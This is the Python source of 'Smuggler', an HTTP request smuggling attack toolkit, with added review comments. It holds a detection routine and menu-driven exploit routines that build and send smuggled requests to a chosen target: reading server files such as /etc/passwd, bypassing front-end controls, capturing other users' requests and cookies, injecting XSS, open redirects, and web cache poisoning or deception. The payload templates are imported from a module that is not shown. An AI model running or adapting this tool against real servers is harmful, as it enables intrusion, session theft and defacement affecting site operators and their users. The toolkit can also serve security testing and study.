
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import sys, socket, ssl
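VERSION = "v0.1_beta"
RELEASE = "25_04_2020"
SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
SOURCE2 = "https://github.com/epsylon/smuggler"
CONTACT = "epsylon@riseup.net - (https://03c8.net)"

# The request templates live in the sibling ``payloads`` package. Only import
# failures are trapped (ImportError, plus SyntaxError for a template module
# that does not parse under the running interpreter): the bare ``except:``
# this replaces also swallowed KeyboardInterrupt and SystemExit. A non-zero
# exit status makes the failure visible to a calling shell or CI job instead
# of reporting success.
try:
    import payloads.payloads  # import payloads
except (ImportError, SyntaxError):
    print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n")
    sys.exit(1)

# Attack-type labels (the part before "#" of each detection payload) that
# send_payload() judged as working; read by show_results() after a run.
VULNERABLE_LIST = []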
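def set_target():
    """Interactively collect the target and request settings.

    Prompts for a URL, an HTTP method and a path and returns the tuple
    ``(host, port, use_ssl, method, path)``:

    * ``host`` – the entered URL lowercased with its leading ``http://`` or
      ``https://`` removed. Only the prefix is stripped; the original used
      ``str.replace`` and so also deleted a scheme string that appeared
      later in the input (for example inside a query parameter).
    * ``port`` – 80 for http, 443 for https.
    * ``use_ssl`` – True for https, False for http.
    * ``method`` – the entered method uppercased; only GET and POST pass.
    * ``path`` – the entered path, or "/" when left empty.

    Any other scheme or method prints an error and exits the process with
    status 1 (it was 0, which reported success to the caller). No further
    validation is done: ``host`` is used verbatim as the socket address and
    the ``Host:`` header by the callers, so it must be a bare host name or IP.
    """
    target = input("\n + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower()
    if target.startswith("http://"):
        target = target[len("http://"):]
        port = 80
        SSL = False
    elif target.startswith("https://"):
        target = target[len("https://"):]
        port = 443
        SSL = True
    else:
        print("\n[Error] Target is invalid: '"+str(target)+"'\n")
        print("="*50)
        sys.exit(1)
    method = input("\n + Enter HTTP Method (ex: POST): ").upper()
    if method not in ("GET", "POST"):
        print("\n[Error] Method is invalid: '"+str(method)+"'\n")
        print("="*50)
        sys.exit(1)
    path = input("\n + Enter PATH (ex: '/'): ")
    if path == "":
        path = "/"
    return target, port, SSL, method, path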
def detect():  # detect menu
    """Run the detection phase against the interactively chosen target.

    Each entry of ``payloads.payloads.payloads`` has the form
    ``"<attack type>#<request tail>"``. The tail is appended to a request
    line and ``Host:`` header built from the target settings and handed to
    send_payload(), which appends working attack types to VULNERABLE_LIST;
    show_results() prints the summary at the end.
    """
    target, port, SSL, method, path = set_target()  # set target
    print("\n" + "=" * 50 + "\n")
    print("[Info] Starting HTTP Smuggling detection ...")
    payloads_dsync = payloads.payloads.payloads  # load payloads
    addr = (target, port)
    # Request prefix shared by every payload; only the tail differs.
    request_head = f"{method} {path} HTTP/1.1\r\nHost: {target}\r\n"
    separator = "=" * 50
    print("")
    for entry in payloads_dsync:
        parts = entry.split("#")
        attack_type, payload_type = parts[0], parts[1]
        print(separator)
        print(f"Trying payload: [{attack_type}]")
        print(separator + "\n")
        request = request_head + payload_type
        print("+ PAYLOAD:\n")
        print(request)
        send_payload(attack_type, request, addr, SSL)  # send each payload
    show_results(target, port, method, path)  # show final results
def send_payload(attack_type, payload, addr, SSL):
    """Send one detection request and record whether it looks "working".

    Connects to ``addr`` (a ``(host, port)`` tuple), TLS-wrapped when ``SSL``
    is true, writes ``payload`` and reads the reply until the peer closes
    the connection. The payload is reported as working, and ``attack_type``
    appended to VULNERABLE_LIST, whenever the reply contains at least one
    ``HTTP/1.1 `` status line that is not one of the three recognised
    ``400 Bad Request`` spellings. Any other status counts, including a
    plain 200, so a "WORKING" verdict is a lead to confirm by hand rather
    than proof of a desynchronisation. Returns nothing.

    Caveats visible in the code below, left unchanged and flagged inline:
    - ``ssl.wrap_socket`` verifies no server certificate by default and was
      removed in Python 3.12; an ``ssl.SSLContext`` is the replacement.
    - No socket timeout is set, so ``recv`` blocks for as long as a
      keep-alive server leaves the connection open.
    - Each 1024-byte chunk is decoded on its own; a UTF-8 sequence split
      across chunks, or a non-UTF-8 body, raises UnicodeDecodeError and the
      sockets are then never closed.
    - The bare ``except:`` around connect also swallows KeyboardInterrupt.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if SSL == True: # ssl
        # NOTE(review): default cert_reqs is CERT_NONE (no verification);
        # wrap_socket is gone from Python 3.12 — see docstring.
        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
    try:
        if SSL == True: # ssl
            ss.connect(addr)
        else:
            s.connect(addr)
    except:
        # Connection failure: report, release both sockets and skip this payload.
        print("-"*45)
        print("[Error] Generating socket... -> [PASSING!]")
        print("-"*45+"\n")
        s.close()
        if SSL == True: # ssl
            ss.close()
        return
    # NOTE(review): range(1, 20) is 19 iterations, not the 20 the comment
    # says. The read loop below only ends once the peer has closed the
    # connection, so every iteration after the first writes to an already
    # closed connection — confirm this repetition is intended.
    for i in range(1,20): # 20x tests
        if SSL == True: # ssl
            ss.send(payload.encode('utf-8'))
        else:
            s.send(payload.encode('utf-8'))
        datas=""
        # Accumulate the reply until recv() returns b"" (peer closed).
        while 1:
            if SSL == True: # ssl
                data = ss.recv(1024)
            else:
                data = s.recv(1024)
            if not data:
                break
            # NOTE(review): per-chunk decode; a multibyte character split at
            # a chunk boundary raises here.
            datas += str(data.decode('utf-8'))
        print("\n+ REPLY:\n")
        print(str(datas))
        # resp_c counts status lines that are not a recognised 400; ``wait``
        # suppresses the lines following a 400 until the next status line.
        # ``resp`` collects the non-suppressed lines but is never read.
        resp_c=0
        resp=""
        wait=False
        for line in datas.split('\n'):
            if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'):
                wait=True
            elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'):
                wait=True
            elif line.startswith('HTTP/1.1 '):
                wait=False
                resp_c+=1
            if not wait:
                resp += line+'\n'
        # NOTE(review): indentation was recovered from a flattened listing;
        # the verdict below is taken to be inside the retry loop (one verdict
        # per reply) — confirm against the original file.
        print("-"*45)
        if resp_c > 0:
            print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)")
            VULNERABLE_LIST.append(attack_type) # add attack type for results
        else:
            print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...")
        print("-"*45+"\n")
    s.close()
    if SSL == True: # ssl
        ss.close()
def show_results(target, port, method, path):
    """Print the summary of a detection run.

    Echoes the target settings and, when VULNERABLE_LIST is non-empty, one
    description per distinct attack class (CL-CL, TE-TE, TE-CL, CL-TE) in
    the order each class first appears in the list. Entries whose label
    starts with none of the four prefixes are ignored. Returns nothing.
    """
    frame = "=" * 50
    print(frame)
    print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n")
    print("-" * 45 + "\n")
    print(f" - TARGET: {target}:{port}")
    print(f" - Method: {method}")
    print(f" - Path : {path}")
    # Label prefix -> one-line description; each is printed at most once.
    descriptions = {
        "CL-CL": " * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]",
        "TE-TE": " * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]",
        "TE-CL": " * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content Length]",
        "CL-TE": " * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]",
    }
    if not VULNERABLE_LIST:
        print("\n - STATUS: [ NOT VULNERABLE ]")
    else:
        print("\n - STATUS: [ VULNERABLE !!! ]\n")
        reported = set()
        for label in VULNERABLE_LIST:  # resume vulnerable payloads found
            for prefix, text in descriptions.items():
                if prefix not in reported and label.startswith(prefix):
                    print(text)
                    reported.add(prefix)
    print("\n" + frame + "\n")
def exploit():  # exploit menu
    """Show the exploit menu and run the routine matching the answer.

    Answers "0" to "7" map to the exploit_* functions below; any other
    answer prints a message and exits the process.
    """
    handlers = {
        "0": exploit_steal,         # steal files
        "1": exploit_bypass,        # bypass front-end
        "2": exploit_reveal,        # reveal front-end rewriting
        "3": exploit_capture,       # capture users requests
        "4": exploit_xss,           # re-exploit xss reflection
        "5": exploit_openredirect,  # turn into open-redirect 'zombie'
        "6": exploit_poison,        # webcache poisoning
        "7": exploit_deception,     # webcache deception
    }
    choice = input("\n+ SELECT EXPLOIT:\n\n (0) Steal files (ex: '/etc/passwd')\n (1) Bypass Front-End Security Controls\n (2) Reveal Front-End Rewriting\n (3) Capture Users Requests\n (4) Re-Exploit a XSS Reflected\n (5) Turn into an Open-Redirect\n (6) Web Cache Poisoning\n (7) Web Cache Deception\n\n")
    handler = handlers.get(choice)
    if handler is None:  # exit
        print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
        sys.exit()
    handler()
def send_exploit(addr, SSL, exploit):
    """Send one prepared request to ``addr`` and print the raw reply.

    ``addr`` is a ``(host, port)`` tuple and ``exploit`` the fully
    substituted request text; with ``SSL`` true the socket is TLS-wrapped.
    The reply is read until the peer closes the connection and printed
    verbatim; nothing is returned and no verdict is recorded. A connection
    failure is printed and the request skipped.

    Caveats visible in the code below, left unchanged and flagged inline:
    - ``ssl.wrap_socket`` verifies no server certificate by default and was
      removed in Python 3.12; an ``ssl.SSLContext`` is the replacement.
    - No socket timeout is set, so ``recv`` blocks for as long as a
      keep-alive server leaves the connection open.
    - Each 1024-byte chunk is decoded on its own; a UTF-8 sequence split
      across chunks, or a non-UTF-8 body, raises UnicodeDecodeError and the
      sockets are then never closed.
    - The bare ``except:`` around connect also swallows KeyboardInterrupt.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if SSL == True: # ssl
        # NOTE(review): default cert_reqs is CERT_NONE (no verification);
        # wrap_socket is gone from Python 3.12 — see docstring.
        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
    try:
        if SSL == True: # ssl
            ss.connect(addr)
        else:
            s.connect(addr)
    except:
        # Connection failure: report, release both sockets and skip.
        print("\n"+"-"*45)
        print("[Error] Generating socket... -> [PASSING!]")
        print("-"*45+"\n")
        s.close()
        if SSL == True: # ssl
            ss.close()
        return
    if SSL == True: # ssl
        ss.send(exploit.encode('utf-8'))
    else:
        s.send(exploit.encode('utf-8'))
    datas=""
    # Accumulate the reply until recv() returns b"" (peer closed).
    while 1:
        if SSL == True: # ssl
            data = ss.recv(1024)
        else:
            s.recv(1024) if False else None  # (placeholder never executed; see next line)
            data = s.recv(1024)
        if not data:
            break
        # NOTE(review): per-chunk decode; a multibyte character split at a
        # chunk boundary raises here.
        datas += str(data.decode('utf-8'))
    print("\n+ REPLY:\n")
    print(str(datas))
    # NOTE(review): unlike the connect branch, the normal path never closes
    # ``s``/``ss``; the sockets are only released by garbage collection.
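def exploit_bypass():
    """Exploit menu (1): front-end access-control bypass.

    Collects the target, a restricted path, a Content-Length value and a
    payload mode, then hands every ``EXPLOIT-1`` template from
    ``payloads.payloads.exploits`` that matches the mode to
    exploit_bypass_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_bypass_armed() inline and now calls it; the ``int()`` parse
    traps only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to Bypass Front-End Security Controls...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    restricted_path = input("\n + Enter RESTRICTED ZONE (ex: '/admin'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '50'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 50
    if not content_length:
        content_length = 50
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-1" not in exp:  # extract all exploit-1 (bypass front-end ACLs)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)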
def exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-1 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$restricted_path`` and ``$CL`` are replaced in that
    order (a value may therefore itself feed a later placeholder, exactly
    as before); the result is printed and passed to send_exploit(). The
    mode shown in the banner is the second ``_``-separated field of the
    template name. Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$restricted_path", restricted_path),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
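def exploit_reveal():
    """Exploit menu (2): reveal front-end request rewriting.

    Collects the target, the name of a reflected parameter, a
    Content-Length value and a payload mode, then hands every ``EXPLOIT-2``
    template from ``payloads.payloads.exploits`` that matches the mode to
    exploit_reveal_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_reveal_armed() inline and now calls it; the ``int()`` parse
    traps only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to Reveal Front-End Rewriting...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    parameter = input("\n + Enter PARAMETER reflected (ex: 'user'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 130
    if not content_length:
        content_length = 130
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-2" not in exp:  # extract exploit-2 (reveal rewriting)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)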
def exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-2 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$parameter`` and ``$CL`` are replaced in that order; the
    result is printed and passed to send_exploit(). The mode shown in the
    banner is the second ``_``-separated field of the template name.
    Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$parameter", parameter),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
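def exploit_capture():
    """Exploit menu (3): capture other users' requests.

    Collects the target, a parameter string, a cookie string, a
    Content-Length value and a payload mode, then hands every ``EXPLOIT-3``
    template from ``payloads.payloads.exploits`` that matches the mode to
    exploit_capture_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_capture_armed() inline and now calls it; the ``int()`` parse
    traps only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    parameters = input("\n + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ")
    cookie = input("\n + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 130
    if not content_length:
        content_length = 130
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-3" not in exp:  # extract exploit-3 (capture users requests)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)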
def exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-3 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$parameters``, ``$cookie`` and ``$CL`` are replaced in
    that order; the result is printed and passed to send_exploit(). The
    mode shown in the banner is the second ``_``-separated field of the
    template name. Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$parameters", parameters),
        ("$cookie", cookie),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
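def exploit_xss():
    """Exploit menu (4): replay a header-reflected XSS through smuggling.

    Collects the target, the reflected header name, the injection string, a
    Content-Length value and a payload mode, then hands every ``EXPLOIT-4``
    template from ``payloads.payloads.exploits`` that matches the mode to
    exploit_xss_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_xss_armed() inline and now calls it; the ``int()`` parse traps
    only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    header = input("\n + Enter VULNERABLE HEADER (ex: 'User-Agent'): ")
    xss = input("\n + Enter XSS Injection (ex: '<script>alert(1)</script>'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-4" not in exp:  # extract exploit-4 (re-exploit XSS)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)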
def exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-4 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$header``, ``$xss`` and ``$CL`` are replaced in that
    order; the result is printed and passed to send_exploit(). The mode
    shown in the banner is the second ``_``-separated field of the
    template name. Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$header", header),
        ("$xss", xss),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
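def exploit_openredirect():
    """Exploit menu (5): turn an on-site redirect into an open redirect.

    Collects the target, a replacement location, a Content-Length value and
    a payload mode, then hands every ``EXPLOIT-5`` template from
    ``payloads.payloads.exploits`` that matches the mode to
    exploit_openredirect_armed(), which fills in the placeholders and sends
    it. A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to
    templates whose name contains that mode; anything else (including an
    empty answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_openredirect_armed() inline and now calls it; the ``int()``
    parse traps only ValueError instead of a bare ``except:`` that also
    swallowed KeyboardInterrupt. Empty input and 0 still fall back to the
    default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    location = input("\n + Enter NEW LOCATION (ex: 'otherwebsite.com'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-5" not in exp:  # extract exploit-5 (open-redirect)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)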
def exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-5 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$location`` and ``$CL`` are replaced in that order; the
    result is printed and passed to send_exploit(). The mode shown in the
    banner is the second ``_``-separated field of the template name.
    Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$location", location),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
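def exploit_poison():
    """Exploit menu (6): web cache poisoning.

    Collects the target, a host and a script path to be injected, a
    Content-Length value and a payload mode, then hands every ``EXPLOIT-6``
    template from ``payloads.payloads.exploits`` that matches the mode to
    exploit_poison_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_poison_armed() inline and now calls it; the ``int()`` parse
    traps only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to perform web cache poisoning...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    location = input("\n + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ")
    script = input("\n + Enter POISON SOURCE (ex: '/static/defaced.js'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-6" not in exp:  # extract exploit-6 (web cache poison)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)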
def exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-6 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$location``, ``$script`` and ``$CL`` are replaced in
    that order; the result is printed and passed to send_exploit(). The
    mode shown in the banner is the second ``_``-separated field of the
    template name. Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$location", location),
        ("$script", script),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
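def exploit_deception():
    """Exploit menu (7): web cache deception.

    Collects the target, a restricted path, a Content-Length value and a
    payload mode, then hands every ``EXPLOIT-7`` template from
    ``payloads.payloads.exploits`` that matches the mode to
    exploit_deception_armed(), which fills in the placeholders and sends it.
    A mode of TE-CL, CL-TE, TE-TE or CL-CL restricts the run to templates
    whose name contains that mode; anything else (including an empty
    answer) sends all of them. Returns nothing.

    Changes from the original: the "send all" branch duplicated the body of
    exploit_deception_armed() inline and now calls it; the ``int()`` parse
    traps only ValueError instead of a bare ``except:`` that also swallowed
    KeyboardInterrupt. Empty input and 0 still fall back to the default.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to perform web cache deception leaking...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    private = input("\n + Enter RESTRICTED ZONE (ex: '/private/messages'): ")
    content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ")
    request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except ValueError:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits  # load exploits
    modes = ("TE-CL", "CL-TE", "TE-TE", "CL-CL")
    for exp in exploits_dsync:
        if "EXPLOIT-7" not in exp:  # extract exploit-7 (web cache deception)
            continue
        if request_type in modes and request_type not in exp:
            continue  # template does not carry the selected mode
        exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)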
def exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL):
    """Fill in one EXPLOIT-7 template and send it.

    ``exp`` has the form ``"<name>#<template>"``. ``$method``, ``$path``,
    ``$target``, ``$private`` and ``$CL`` are replaced in that order; the
    result is printed and passed to send_exploit(). The mode shown in the
    banner is the second ``_``-separated field of the template name.
    Returns nothing.
    """
    parts = exp.split("#")
    request = parts[1]
    mode = parts[0].split("_")[1]
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$private", private),
        ("$CL", str(content_length)),
    )
    for placeholder, value in substitutions:
        request = request.replace(placeholder, value)
    print("\n" + "=" * 50 + "\n")
    print(f"+ PAYLOAD MODE: [{mode}]\n")
    print(request)
    send_exploit(addr, SSL, request)  # send expoit
def exploit_steal():
    """Exploit menu (0): send every EXPLOIT-0 template with a file path filled in.

    Unlike the other exploit routines there is no payload-mode selection
    and no Content-Length prompt: ``$CL`` is set to ``len(files) + 2`` and
    the banner always shows CL-CL. Each matching template from
    ``payloads.payloads.exploits`` is printed and passed to send_exploit().
    Returns nothing.
    """
    print("\n" + "=" * 50 + "\n")
    print("[Info] Trying to steal files from server...")
    target, port, SSL, method, path = set_target()  # set target
    addr = (target, port)
    files = input("\n + Enter FILE (ex: '/etc/passwd'): ")
    content_length = len(files) + 2  # p=len(files)
    substitutions = (
        ("$method", method),
        ("$path", path),
        ("$target", target),
        ("$files", files),
        ("$CL", str(content_length)),
    )
    exploits_dsync = payloads.payloads.exploits  # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-0" not in exp:  # extract exploit-0 (steal files)
            continue
        request = exp.split("#")[1]
        for placeholder, value in substitutions:
            request = request.replace(placeholder, value)
        print("\n" + "=" * 50 + "\n")
        print("+ PAYLOAD MODE: [CL-CL]\n")
        print(request)
        send_exploit(addr, SSL, request)  # send expoit
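def print_banner():
    """Print the start-up banner: ASCII-art name, version, sources and contact.

    The art lines are raw string literals. Their backslashes are not valid
    escape sequences, so as ordinary literals they produced the same bytes
    but triggered invalid-escape warnings (DeprecationWarning, a
    SyntaxWarning from Python 3.12); raw literals print identically without
    the warning. NOTE(review): the art's spacing is reproduced from a
    rendered listing and may have been collapsed — compare with the
    original file.
    """
    print("\n" + "=" * 50)
    print(r" ____ __ __ _ _ ____ ____ _ _____ ____ ")
    print(r"/ ___|| \/ | | | |/ ___|/ ___| | | ____| _ \ ")
    print(r"\___ \| |\/| | | | | | _| | _| | | _| | |_) |")
    print(r" ___) | | | | |_| | |_| | |_| | |___| |___| _ < ")
    print(r"|____/|_| |_|\___/ \____|\____|_____|_____|_| \_\ by psy")
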